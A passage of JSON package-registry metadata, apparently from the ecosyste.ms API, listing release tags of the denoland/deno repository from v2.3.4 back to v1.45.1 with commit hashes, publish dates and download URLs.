:"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_p